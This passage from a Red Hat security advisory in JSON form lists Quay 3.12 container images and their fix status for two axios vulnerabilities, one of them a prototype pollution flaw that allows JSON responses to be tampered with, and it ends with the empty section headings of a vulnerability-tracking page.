            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: NO_PROXY bypass via crafted URL"
    },
    {
      "cve": "CVE-2026-42044",
      "cwe": {
        "id": "CWE-915",
        "name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
      },
      "discovery_date": "2026-04-24T19:01:13.418725+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2461624"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Axios, a widely used HTTP client. This vulnerability, known as a Prototype Pollution \"Gadget\" attack, allows a remote attacker to subtly alter JSON API responses. By manipulating a specific function, an attacker can selectively modify data within these responses. This could lead to significant security breaches, including unauthorized privilege escalation, fraudulent balance manipulation, or bypassing critical authorization checks.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "RHBZ#2461624",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2461624"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-42044",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42044"
        },
        {
          "category": "external",
          "summary": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23",
          "url": "https://github.com/axios/axios/security/advisories/GHSA-3w6x-2g7m-8v23"
        }
      ],
      "release_date": "2026-04-24T17:49:49.517000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.4,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "axios: Axios: Invisible JSON Response Tampering via Prototype Pollution Gadget"
    }
  ]
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-33894 (GCVE-0-2026-33894)

Solutions

Solutions

Vulnerability from cleanstart

Summary

Impacted Deployments

Root Cause

Reproduction Steps

Proof of Concept

Suggested Patch

Resources

Credit

Tags

Sightings

Nomenclature